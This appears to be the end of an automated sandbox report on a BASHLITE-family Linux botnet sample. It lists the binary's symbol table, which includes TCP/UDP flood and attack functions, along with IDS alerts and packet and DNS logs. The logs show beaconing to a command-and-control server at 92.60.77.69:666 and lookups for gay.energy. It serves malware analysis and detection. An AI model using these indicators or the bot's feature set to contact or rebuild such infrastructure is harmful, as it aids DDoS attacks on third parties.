                pipe.symtab0x40db7064FUNC<unknown>DEFAULT3
                poll.symtab0x41aca092FUNC<unknown>DEFAULT3
                poll.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                prctl.symtab0x40dd70124FUNC<unknown>DEFAULT3
                prctl.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                prefix.4694.symtab0x41ecb012OBJECT<unknown>DEFAULT5
                print.symtab0x4017341460FUNC<unknown>DEFAULT3
                printchar.symtab0x4011a4184FUNC<unknown>DEFAULT3
                printi.symtab0x401498668FUNC<unknown>DEFAULT3
                prints.symtab0x40125c572FUNC<unknown>DEFAULT3
                processCmd.symtab0x406bbc11596FUNC<unknown>DEFAULT3
                program_invocation_name.symtab0x4606484OBJECT<unknown>DEFAULT11
                program_invocation_short_name.symtab0x4606444OBJECT<unknown>DEFAULT11
                qual_chars.4702.symtab0x41ecd020OBJECT<unknown>DEFAULT5
                raise.symtab0x41805076FUNC<unknown>DEFAULT3
                raise.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                rand.symtab0x41299028FUNC<unknown>DEFAULT3
                rand.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                rand.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                rand__str.symtab0x40affc348FUNC<unknown>DEFAULT3
                rand_alpha_str.symtab0x40b158300FUNC<unknown>DEFAULT3
                rand_alphastr.symtab0x400fd4464FUNC<unknown>DEFAULT3
                rand_cmwc.symtab0x400dfc472FUNC<unknown>DEFAULT3
                rand_init.symtab0x40ade0248FUNC<unknown>DEFAULT3
                rand_next.symtab0x40aed8292FUNC<unknown>DEFAULT3
                random.symtab0x4129b0164FUNC<unknown>DEFAULT3
                random.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                random_poly_info.symtab0x41f97040OBJECT<unknown>DEFAULT5
                random_r.symtab0x412dd4172FUNC<unknown>DEFAULT3
                random_r.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                randtbl.symtab0x460578128OBJECT<unknown>DEFAULT11
                rawmemchr.symtab0x417720192FUNC<unknown>DEFAULT3
                rawmemchr.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                read.symtab0x40df8088FUNC<unknown>DEFAULT3
                read.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                read_etc_hosts_r.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                readdir64.symtab0x414b80272FUNC<unknown>DEFAULT3
                readdir64.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                realloc.symtab0x411d401156FUNC<unknown>DEFAULT3
                realloc.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                recv.symtab0x410b5092FUNC<unknown>DEFAULT3
                recv.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                recvLine.symtab0x402ccc876FUNC<unknown>DEFAULT3
                recvfrom.symtab0x410c3432FUNC<unknown>DEFAULT3
                recvfrom.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                resolv.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                resolv_conf_mtime.5363.symtab0x466ee84OBJECT<unknown>DEFAULT15
                resolv_domain_to_hostname.symtab0x40b290360FUNC<unknown>DEFAULT3
                resolv_entries_free.symtab0x40bf14164FUNC<unknown>DEFAULT3
                resolv_lookup.symtab0x40b53c2520FUNC<unknown>DEFAULT3
                resolv_skip_name.symtab0x40b3f8324FUNC<unknown>DEFAULT3
                rindex.symtab0x417940160FUNC<unknown>DEFAULT3
                rtcp.symtab0x404d681732FUNC<unknown>DEFAULT3
                sbrk.symtab0x4144c0164FUNC<unknown>DEFAULT3
                sbrk.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                scanPid.symtab0x460bec4OBJECT<unknown>DEFAULT14
                select.symtab0x40df5c32FUNC<unknown>DEFAULT3
                select.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                send.symtab0x410c6092FUNC<unknown>DEFAULT3
                send.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                sendSTD.symtab0x40542c728FUNC<unknown>DEFAULT3
                sendto.symtab0x410d4432FUNC<unknown>DEFAULT3
                sendto.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                setsockopt.symtab0x410d70124FUNC<unknown>DEFAULT3
                setsockopt.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                setstate.symtab0x412a54184FUNC<unknown>DEFAULT3
                setstate_r.symtab0x412c90324FUNC<unknown>DEFAULT3
                sigaction.symtab0x4142d028FUNC<unknown>DEFAULT3
                sigaction.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                sigaddset.symtab0x410e50104FUNC<unknown>DEFAULT3
                sigaddset.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                sigempty.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                sigemptyset.symtab0x410ec036FUNC<unknown>DEFAULT3
                signal.symtab0x410ef0236FUNC<unknown>DEFAULT3
                signal.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                sigprocmask.symtab0x40e2d096FUNC<unknown>DEFAULT3
                sigprocmask.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                sigsetops.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                skip_and_NUL_space.symtab0x41a0c8104FUNC<unknown>DEFAULT3
                skip_nospace.symtab0x41a060104FUNC<unknown>DEFAULT3
                sleep.symtab0x4134f0288FUNC<unknown>DEFAULT3
                sleep.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                socket.symtab0x410df088FUNC<unknown>DEFAULT3
                socket.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                socket_connect.symtab0x406380444FUNC<unknown>DEFAULT3
                sockprintf.symtab0x401dd8344FUNC<unknown>DEFAULT3
                spec_and_mask.4701.symtab0x41ece416OBJECT<unknown>DEFAULT5
                spec_base.4693.symtab0x41ecbc7OBJECT<unknown>DEFAULT5
                spec_chars.4698.symtab0x41ed4021OBJECT<unknown>DEFAULT5
                spec_flags.4697.symtab0x41ed588OBJECT<unknown>DEFAULT5
                spec_or_mask.4700.symtab0x41ecf416OBJECT<unknown>DEFAULT5
                spec_ranges.4699.symtab0x41ed049OBJECT<unknown>DEFAULT5
                sprintf.symtab0x40e46080FUNC<unknown>DEFAULT3
                sprintf.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                srand.symtab0x412bdc172FUNC<unknown>DEFAULT3
                srandom.symtab0x412bdc172FUNC<unknown>DEFAULT3
                srandom_r.symtab0x412e80400FUNC<unknown>DEFAULT3
                stat.symtab0x41add0144FUNC<unknown>DEFAULT3
                stat.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                stderr.symtab0x4604084OBJECT<unknown>DEFAULT11
                stdin.symtab0x4604004OBJECT<unknown>DEFAULT11
                stdout.symtab0x4604044OBJECT<unknown>DEFAULT11
                strcasecmp.symtab0x41b5b0108FUNC<unknown>DEFAULT3
                strcasecmp.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                strchr.symtab0x410460248FUNC<unknown>DEFAULT3
                strchr.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                strchrnul.symtab0x417a30248FUNC<unknown>DEFAULT3
                strchrnul.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                strcmp.symtab0x41024044FUNC<unknown>DEFAULT3
                strcmp.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                strcoll.symtab0x41024044FUNC<unknown>DEFAULT3
                strcpy.symtab0x41037036FUNC<unknown>DEFAULT3
                strcpy.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                strcspn.symtab0x417690144FUNC<unknown>DEFAULT3
                strcspn.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                strdup.symtab0x41af10140FUNC<unknown>DEFAULT3
                strdup.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                strerror_r.symtab0x4105f0388FUNC<unknown>DEFAULT3
                strlen.symtab0x410180184FUNC<unknown>DEFAULT3
                strlen.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                strncpy.symtab0x4103a0188FUNC<unknown>DEFAULT3
                strncpy.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                strnlen.symtab0x410270248FUNC<unknown>DEFAULT3
                strnlen.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                strpbrk.symtab0x417b3064FUNC<unknown>DEFAULT3
                strpbrk.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                strrchr.symtab0x417940160FUNC<unknown>DEFAULT3
                strrchr.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                strspn.symtab0x4178f072FUNC<unknown>DEFAULT3
                strspn.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                strstr.symtab0x410080256FUNC<unknown>DEFAULT3
                strstr.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                strtok.symtab0x4105d032FUNC<unknown>DEFAULT3
                strtok.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                strtok_r.symtab0x4175c0208FUNC<unknown>DEFAULT3
                strtok_r.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                strtol.symtab0x41318028FUNC<unknown>DEFAULT3
                strtol.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                sysconf.symtab0x41380c748FUNC<unknown>DEFAULT3
                sysconf.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                szprintf.symtab0x401d60120FUNC<unknown>DEFAULT3
                table.symtab0x466ef0240OBJECT<unknown>DEFAULT15
                table.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                table_init.symtab0x40bfc01112FUNC<unknown>DEFAULT3
                table_key.symtab0x4603904OBJECT<unknown>DEFAULT11
                table_lock_val.symtab0x40c49c132FUNC<unknown>DEFAULT3
                table_retrieve_val.symtab0x40c520144FUNC<unknown>DEFAULT3
                table_unlock_val.symtab0x40c418132FUNC<unknown>DEFAULT3
                tcgetattr.symtab0x4107e0176FUNC<unknown>DEFAULT3
                tcgetattr.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                tcpFl00d.symtab0x40445c2316FUNC<unknown>DEFAULT3
                tcpcsum.symtab0x403884348FUNC<unknown>DEFAULT3
                time.symtab0x40dd6016FUNC<unknown>DEFAULT3
                time.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                times.symtab0x4146c016FUNC<unknown>DEFAULT3
                times.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                toggle_obf.symtab0x40c678552FUNC<unknown>DEFAULT3
                toupper.symtab0x40e39060FUNC<unknown>DEFAULT3
                toupper.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                trim.symtab0x400c10492FUNC<unknown>DEFAULT3
                type_codes.symtab0x41ed1024OBJECT<unknown>DEFAULT5
                type_sizes.symtab0x41ed2812OBJECT<unknown>DEFAULT5
                udpfl00d.symtab0x403b082388FUNC<unknown>DEFAULT3
                uname.symtab0x41b55088FUNC<unknown>DEFAULT3
                uname.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                unknown.1326.symtab0x41ede014OBJECT<unknown>DEFAULT5
                unsafe_state.symtab0x46060020OBJECT<unknown>DEFAULT11
                uppercase.symtab0x402b1c164FUNC<unknown>DEFAULT3
                userID.symtab0x4602e84OBJECT<unknown>DEFAULT11
                usleep.symtab0x413bd0144FUNC<unknown>DEFAULT3
                usleep.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                util.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                util_atoi.symtab0x40cdc4968FUNC<unknown>DEFAULT3
                util_fdgets.symtab0x40d84c324FUNC<unknown>DEFAULT3
                util_isalpha.symtab0x40d9f8144FUNC<unknown>DEFAULT3
                util_isdigit.symtab0x40db08104FUNC<unknown>DEFAULT3
                util_isspace.symtab0x40da88128FUNC<unknown>DEFAULT3
                util_isupper.symtab0x40d990104FUNC<unknown>DEFAULT3
                util_itoa.symtab0x40d18c572FUNC<unknown>DEFAULT3
                util_local_addr.symtab0x40d6f8340FUNC<unknown>DEFAULT3
                util_memcpy.symtab0x40cca8164FUNC<unknown>DEFAULT3
                util_memsearch.symtab0x40d3c8292FUNC<unknown>DEFAULT3
                util_strcat.symtab0x40cc00168FUNC<unknown>DEFAULT3
                util_strcmp.symtab0x40ca54288FUNC<unknown>DEFAULT3
                util_strcpy.symtab0x40cb74140FUNC<unknown>DEFAULT3
                util_stristr.symtab0x40d4ec524FUNC<unknown>DEFAULT3
                util_strlen.symtab0x40c8a0116FUNC<unknown>DEFAULT3
                util_strncmp.symtab0x40c914320FUNC<unknown>DEFAULT3
                util_zero.symtab0x40cd4c120FUNC<unknown>DEFAULT3
                vfork.symtab0x40dc1076FUNC<unknown>DEFAULT3
                vivid_bp.symtab0x4602e04OBJECT<unknown>DEFAULT11
                vseattack.symtab0x4058502492FUNC<unknown>DEFAULT3
                vsnprintf.symtab0x40e4b0252FUNC<unknown>DEFAULT3
                vsnprintf.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                w.symtab0x464c5c4OBJECT<unknown>DEFAULT15
                wait4.symtab0x4142f092FUNC<unknown>DEFAULT3
                wait4.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                waitpid.symtab0x40de6028FUNC<unknown>DEFAULT3
                waitpid.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                watchdog_maintain.symtab0x4008b0564FUNC<unknown>DEFAULT3
                watchdog_pid.symtab0x460c344OBJECT<unknown>DEFAULT15
                wcrtomb.symtab0x415270108FUNC<unknown>DEFAULT3
                wcrtomb.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                wcsnrtombs.symtab0x415320216FUNC<unknown>DEFAULT3
                wcsnrtombs.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                wcsrtombs.symtab0x4152e064FUNC<unknown>DEFAULT3
                wcsrtombs.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                wildString.symtab0x4027ec656FUNC<unknown>DEFAULT3
                write.symtab0x40e1a088FUNC<unknown>DEFAULT3
                write.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                x.symtab0x464c504OBJECT<unknown>DEFAULT15
                xdigits.3351.symtab0x41feb417OBJECT<unknown>DEFAULT5
                xstatconv.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                y.symtab0x464c544OBJECT<unknown>DEFAULT15
                z.symtab0x464c584OBJECT<unknown>DEFAULT15
                zprintf.symtab0x401ce8120FUNC<unknown>DEFAULT3
                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                2025-05-10T07:44:14.452773+02002839489ETPRO MALWARE ELF/BASHLITE Variant CnC Server Response192.60.77.69666192.168.2.1440804TCP
                2025-05-10T07:44:30.009024+02002839489ETPRO MALWARE ELF/BASHLITE Variant CnC Server Response192.60.77.69666192.168.2.1440806TCP
                2025-05-10T07:44:45.567267+02002839489ETPRO MALWARE ELF/BASHLITE Variant CnC Server Response192.60.77.69666192.168.2.1440808TCP
                2025-05-10T07:45:01.128396+02002839489ETPRO MALWARE ELF/BASHLITE Variant CnC Server Response192.60.77.69666192.168.2.1440810TCP
                2025-05-10T07:45:16.685783+02002839489ETPRO MALWARE ELF/BASHLITE Variant CnC Server Response192.60.77.69666192.168.2.1440812TCP
                2025-05-10T07:45:32.244307+02002839489ETPRO MALWARE ELF/BASHLITE Variant CnC Server Response192.60.77.69666192.168.2.1440814TCP
                2025-05-10T07:45:47.802021+02002839489ETPRO MALWARE ELF/BASHLITE Variant CnC Server Response192.60.77.69666192.168.2.1440816TCP
                2025-05-10T07:46:03.359580+02002839489ETPRO MALWARE ELF/BASHLITE Variant CnC Server Response192.60.77.69666192.168.2.1440818TCP
                2025-05-10T07:46:18.916025+02002839489ETPRO MALWARE ELF/BASHLITE Variant CnC Server Response192.60.77.69666192.168.2.1440820TCP
                2025-05-10T07:46:34.471654+02002839489ETPRO MALWARE ELF/BASHLITE Variant CnC Server Response192.60.77.69666192.168.2.1440822TCP
                2025-05-10T07:46:50.030885+02002839489ETPRO MALWARE ELF/BASHLITE Variant CnC Server Response192.60.77.69666192.168.2.1440824TCP
                2025-05-10T07:47:05.583817+02002839489ETPRO MALWARE ELF/BASHLITE Variant CnC Server Response192.60.77.69666192.168.2.1440826TCP
                2025-05-10T07:47:21.142814+02002839489ETPRO MALWARE ELF/BASHLITE Variant CnC Server Response192.60.77.69666192.168.2.1440828TCP
                2025-05-10T07:47:36.710664+02002839489ETPRO MALWARE ELF/BASHLITE Variant CnC Server Response192.60.77.69666192.168.2.1440830TCP
                TimestampSource PortDest PortSource IPDest IP
                May 10, 2025 07:44:13.907644033 CEST40804666192.168.2.1492.60.77.69
                May 10, 2025 07:44:14.180100918 CEST6664080492.60.77.69192.168.2.14
                May 10, 2025 07:44:14.180172920 CEST40804666192.168.2.1492.60.77.69
                May 10, 2025 07:44:14.180701971 CEST40804666192.168.2.1492.60.77.69
                May 10, 2025 07:44:14.452773094 CEST6664080492.60.77.69192.168.2.14
                May 10, 2025 07:44:14.452846050 CEST6664080492.60.77.69192.168.2.14
                May 10, 2025 07:44:14.452883005 CEST6664080492.60.77.69192.168.2.14
                May 10, 2025 07:44:14.452902079 CEST40804666192.168.2.1492.60.77.69
                May 10, 2025 07:44:14.725482941 CEST6664080492.60.77.69192.168.2.14
                May 10, 2025 07:44:29.460728884 CEST40806666192.168.2.1492.60.77.69
                May 10, 2025 07:44:29.734508038 CEST6664080692.60.77.69192.168.2.14
                May 10, 2025 07:44:29.734877110 CEST40806666192.168.2.1492.60.77.69
                May 10, 2025 07:44:29.735584021 CEST40806666192.168.2.1492.60.77.69
                May 10, 2025 07:44:30.009023905 CEST6664080692.60.77.69192.168.2.14
                May 10, 2025 07:44:30.009059906 CEST6664080692.60.77.69192.168.2.14
                May 10, 2025 07:44:30.009147882 CEST6664080692.60.77.69192.168.2.14
                May 10, 2025 07:44:30.009265900 CEST40806666192.168.2.1492.60.77.69
                May 10, 2025 07:44:30.009453058 CEST40806666192.168.2.1492.60.77.69
                May 10, 2025 07:44:30.281534910 CEST6664080692.60.77.69192.168.2.14
                May 10, 2025 07:44:30.281616926 CEST6664080692.60.77.69192.168.2.14
                May 10, 2025 07:44:45.020317078 CEST40808666192.168.2.1492.60.77.69
                May 10, 2025 07:44:45.293590069 CEST6664080892.60.77.69192.168.2.14
                May 10, 2025 07:44:45.294245958 CEST40808666192.168.2.1492.60.77.69
                May 10, 2025 07:44:45.294245958 CEST40808666192.168.2.1492.60.77.69
                May 10, 2025 07:44:45.567156076 CEST6664080892.60.77.69192.168.2.14
                May 10, 2025 07:44:45.567266941 CEST6664080892.60.77.69192.168.2.14
                May 10, 2025 07:44:45.567306042 CEST6664080892.60.77.69192.168.2.14
                May 10, 2025 07:44:45.567555904 CEST40808666192.168.2.1492.60.77.69
                May 10, 2025 07:44:45.840439081 CEST6664080892.60.77.69192.168.2.14
                May 10, 2025 07:45:00.581576109 CEST40810666192.168.2.1492.60.77.69
                May 10, 2025 07:45:00.854563951 CEST6664081092.60.77.69192.168.2.14
                May 10, 2025 07:45:00.854969978 CEST40810666192.168.2.1492.60.77.69
                May 10, 2025 07:45:00.854970932 CEST40810666192.168.2.1492.60.77.69
                May 10, 2025 07:45:01.128248930 CEST6664081092.60.77.69192.168.2.14
                May 10, 2025 07:45:01.128396034 CEST6664081092.60.77.69192.168.2.14
                May 10, 2025 07:45:01.128436089 CEST6664081092.60.77.69192.168.2.14
                May 10, 2025 07:45:01.128917933 CEST40810666192.168.2.1492.60.77.69
                May 10, 2025 07:45:01.401910067 CEST6664081092.60.77.69192.168.2.14
                May 10, 2025 07:45:16.138569117 CEST40812666192.168.2.1492.60.77.69
                May 10, 2025 07:45:16.411710978 CEST6664081292.60.77.69192.168.2.14
                May 10, 2025 07:45:16.412070990 CEST40812666192.168.2.1492.60.77.69
                May 10, 2025 07:45:16.412173986 CEST40812666192.168.2.1492.60.77.69
                May 10, 2025 07:45:16.685714960 CEST6664081292.60.77.69192.168.2.14
                May 10, 2025 07:45:16.685782909 CEST6664081292.60.77.69192.168.2.14
                May 10, 2025 07:45:16.685821056 CEST6664081292.60.77.69192.168.2.14
                May 10, 2025 07:45:16.686121941 CEST40812666192.168.2.1492.60.77.69
                May 10, 2025 07:45:16.959036112 CEST6664081292.60.77.69192.168.2.14
                May 10, 2025 07:45:31.697082043 CEST40814666192.168.2.1492.60.77.69
                May 10, 2025 07:45:31.970721006 CEST6664081492.60.77.69192.168.2.14
                May 10, 2025 07:45:31.971307993 CEST40814666192.168.2.1492.60.77.69
                May 10, 2025 07:45:31.971308947 CEST40814666192.168.2.1492.60.77.69
                May 10, 2025 07:45:32.244220018 CEST6664081492.60.77.69192.168.2.14
                May 10, 2025 07:45:32.244307041 CEST6664081492.60.77.69192.168.2.14
                May 10, 2025 07:45:32.244343996 CEST6664081492.60.77.69192.168.2.14
                May 10, 2025 07:45:32.244529963 CEST40814666192.168.2.1492.60.77.69
                May 10, 2025 07:45:32.517103910 CEST6664081492.60.77.69192.168.2.14
                May 10, 2025 07:45:47.254672050 CEST40816666192.168.2.1492.60.77.69
                May 10, 2025 07:45:47.527307034 CEST6664081692.60.77.69192.168.2.14
                May 10, 2025 07:45:47.527884960 CEST40816666192.168.2.1492.60.77.69
                May 10, 2025 07:45:47.527884960 CEST40816666192.168.2.1492.60.77.69
                May 10, 2025 07:45:47.801956892 CEST6664081692.60.77.69192.168.2.14
                May 10, 2025 07:45:47.802021027 CEST6664081692.60.77.69192.168.2.14
                May 10, 2025 07:45:47.802042007 CEST6664081692.60.77.69192.168.2.14
                May 10, 2025 07:45:47.802511930 CEST40816666192.168.2.1492.60.77.69
                May 10, 2025 07:45:48.076380968 CEST6664081692.60.77.69192.168.2.14
                May 10, 2025 07:46:02.811994076 CEST40818666192.168.2.1492.60.77.69
                May 10, 2025 07:46:03.084851027 CEST6664081892.60.77.69192.168.2.14
                May 10, 2025 07:46:03.085248947 CEST40818666192.168.2.1492.60.77.69
                May 10, 2025 07:46:03.085248947 CEST40818666192.168.2.1492.60.77.69
                May 10, 2025 07:46:03.359549046 CEST6664081892.60.77.69192.168.2.14
                May 10, 2025 07:46:03.359580040 CEST6664081892.60.77.69192.168.2.14
                May 10, 2025 07:46:03.359590054 CEST6664081892.60.77.69192.168.2.14
                May 10, 2025 07:46:03.360058069 CEST40818666192.168.2.1492.60.77.69
                May 10, 2025 07:46:03.632971048 CEST6664081892.60.77.69192.168.2.14
                May 10, 2025 07:46:18.369992018 CEST40820666192.168.2.1492.60.77.69
                May 10, 2025 07:46:18.642937899 CEST6664082092.60.77.69192.168.2.14
                May 10, 2025 07:46:18.643259048 CEST40820666192.168.2.1492.60.77.69
                May 10, 2025 07:46:18.643353939 CEST40820666192.168.2.1492.60.77.69
                May 10, 2025 07:46:18.915962934 CEST6664082092.60.77.69192.168.2.14
                May 10, 2025 07:46:18.916024923 CEST6664082092.60.77.69192.168.2.14
                May 10, 2025 07:46:18.916084051 CEST6664082092.60.77.69192.168.2.14
                May 10, 2025 07:46:18.916353941 CEST40820666192.168.2.1492.60.77.69
                May 10, 2025 07:46:19.189392090 CEST6664082092.60.77.69192.168.2.14
                May 10, 2025 07:46:33.925820112 CEST40822666192.168.2.1492.60.77.69
                May 10, 2025 07:46:34.198440075 CEST6664082292.60.77.69192.168.2.14
                May 10, 2025 07:46:34.198817968 CEST40822666192.168.2.1492.60.77.69
                May 10, 2025 07:46:34.198817968 CEST40822666192.168.2.1492.60.77.69
                May 10, 2025 07:46:34.471587896 CEST6664082292.60.77.69192.168.2.14
                May 10, 2025 07:46:34.471653938 CEST6664082292.60.77.69192.168.2.14
                May 10, 2025 07:46:34.471723080 CEST6664082292.60.77.69192.168.2.14
                May 10, 2025 07:46:34.472070932 CEST40822666192.168.2.1492.60.77.69
                May 10, 2025 07:46:34.744934082 CEST6664082292.60.77.69192.168.2.14
                May 10, 2025 07:46:49.483344078 CEST40824666192.168.2.1492.60.77.69
                May 10, 2025 07:46:49.757024050 CEST6664082492.60.77.69192.168.2.14
                May 10, 2025 07:46:49.757416010 CEST40824666192.168.2.1492.60.77.69
                May 10, 2025 07:46:49.757730007 CEST40824666192.168.2.1492.60.77.69
                May 10, 2025 07:46:50.030813932 CEST6664082492.60.77.69192.168.2.14
                May 10, 2025 07:46:50.030884981 CEST6664082492.60.77.69192.168.2.14
                May 10, 2025 07:46:50.030922890 CEST6664082492.60.77.69192.168.2.14
                May 10, 2025 07:46:50.030968904 CEST40824666192.168.2.1492.60.77.69
                May 10, 2025 07:46:50.304476976 CEST6664082492.60.77.69192.168.2.14
                May 10, 2025 07:47:05.037883043 CEST40826666192.168.2.1492.60.77.69
                May 10, 2025 07:47:05.310399055 CEST6664082692.60.77.69192.168.2.14
                May 10, 2025 07:47:05.310899973 CEST40826666192.168.2.1492.60.77.69
                May 10, 2025 07:47:05.310899973 CEST40826666192.168.2.1492.60.77.69
                May 10, 2025 07:47:05.583719969 CEST6664082692.60.77.69192.168.2.14
                May 10, 2025 07:47:05.583817005 CEST6664082692.60.77.69192.168.2.14
                May 10, 2025 07:47:05.583852053 CEST6664082692.60.77.69192.168.2.14
                May 10, 2025 07:47:05.583945990 CEST40826666192.168.2.1492.60.77.69
                May 10, 2025 07:47:05.856759071 CEST6664082692.60.77.69192.168.2.14
                May 10, 2025 07:47:20.595170021 CEST40828666192.168.2.1492.60.77.69
                May 10, 2025 07:47:20.869220972 CEST6664082892.60.77.69192.168.2.14
                May 10, 2025 07:47:20.869477034 CEST40828666192.168.2.1492.60.77.69
                May 10, 2025 07:47:20.869477034 CEST40828666192.168.2.1492.60.77.69
                May 10, 2025 07:47:21.142750025 CEST6664082892.60.77.69192.168.2.14
                May 10, 2025 07:47:21.142813921 CEST6664082892.60.77.69192.168.2.14
                May 10, 2025 07:47:21.142900944 CEST6664082892.60.77.69192.168.2.14
                May 10, 2025 07:47:21.143172979 CEST40828666192.168.2.1492.60.77.69
                May 10, 2025 07:47:21.416692019 CEST6664082892.60.77.69192.168.2.14
                May 10, 2025 07:47:36.159761906 CEST40830666192.168.2.1492.60.77.69
                May 10, 2025 07:47:36.434356928 CEST6664083092.60.77.69192.168.2.14
                May 10, 2025 07:47:36.434753895 CEST40830666192.168.2.1492.60.77.69
                May 10, 2025 07:47:36.434842110 CEST40830666192.168.2.1492.60.77.69
                May 10, 2025 07:47:36.709930897 CEST6664083092.60.77.69192.168.2.14
                May 10, 2025 07:47:36.710664034 CEST6664083092.60.77.69192.168.2.14
                May 10, 2025 07:47:36.710726976 CEST6664083092.60.77.69192.168.2.14
                May 10, 2025 07:47:36.710943937 CEST40830666192.168.2.1492.60.77.69
                May 10, 2025 07:47:36.985866070 CEST6664083092.60.77.69192.168.2.14
                TimestampSource PortDest PortSource IPDest IP
                May 10, 2025 07:44:14.343796968 CEST5414153192.168.2.141.1.1.1
                May 10, 2025 07:44:14.343796968 CEST4709953192.168.2.141.1.1.1
                May 10, 2025 07:44:14.505690098 CEST53470991.1.1.1192.168.2.14
                May 10, 2025 07:44:14.505877018 CEST4709953192.168.2.141.1.1.1
                May 10, 2025 07:44:14.518811941 CEST53541411.1.1.1192.168.2.14
                May 10, 2025 07:44:14.519336939 CEST5414153192.168.2.141.1.1.1
                May 10, 2025 07:44:14.647154093 CEST53470991.1.1.1192.168.2.14
                May 10, 2025 07:44:14.660587072 CEST53541411.1.1.1192.168.2.14
                May 10, 2025 07:46:56.343882084 CEST3612053192.168.2.141.1.1.1
                May 10, 2025 07:46:56.343945980 CEST3641453192.168.2.141.1.1.1
                May 10, 2025 07:46:56.486195087 CEST53361201.1.1.1192.168.2.14
                May 10, 2025 07:46:56.512118101 CEST53364141.1.1.1192.168.2.14
                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                May 10, 2025 07:44:14.343796968 CEST192.168.2.141.1.1.10xfd88Standard query (0)gay.energyA (IP address)IN (0x0001)false
                May 10, 2025 07:44:14.343796968 CEST192.168.2.141.1.1.10xd901Standard query (0)gay.energy28IN (0x0001)false
                May 10, 2025 07:44:14.505877018 CEST192.168.2.141.1.1.10xd901Standard query (0)gay.energy28IN (0x0001)false
                May 10, 2025 07:44:14.519336939 CEST192.168.2.141.1.1.10xfd88Standard query (0)gay.energyA (IP address)IN (0x0001)false
                May 10, 2025 07:46:56.343882084 CEST192.168.2.141.1.1.10x400fStandard query (0)daisy.ubuntu.comA (IP address)IN (0x0001)false
                May 10, 2025 07:46:56.343945980 CEST192.168.2.141.1.1.10x5e92Standard query (0)daisy.ubuntu.com28IN (0x0001)false
                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                May 10, 2025 07:44:14.505690098 CEST1.1.1.1192.168.2.140xd901Name error (3)gay.energynonenone28IN (0x0001)false
                May 10, 2025 07:44:14.518811941 CEST1.1.1.1192.168.2.140xfd88Name error (3)gay.energynonenoneA (IP address)IN (0x0001)false
                May 10, 2025 07:44:14.647154093 CEST1.1.1.1192.168.2.140xd901Name error (3)gay.energynonenone28IN (0x0001)false
                May 10, 2025 07:44:14.660587072 CEST1.1.1.1192.168.2.140xfd88Name error (3)gay.energynonenoneA (IP address)IN (0x0001)false
                May 10, 2025 07:46:56.486195087 CEST1.1.1.1192.168.2.140x400fNo error (0)daisy.ubuntu.com162.213.35.25A (IP address)IN (0x0001)false
                May 10, 2025 07:46:56.486195087 CEST1.1.1.1192.168.2.140x400fNo error (0)daisy.ubuntu.com162.213.35.24A (IP address)IN (0x0001)false

                System Behavior

                Start time (UTC):05:44:12
                Start date (UTC):10/05/2025
                Path:/tmp/mipsel.elf
                Arguments:/tmp/mipsel.elf
                File size:5773336 bytes
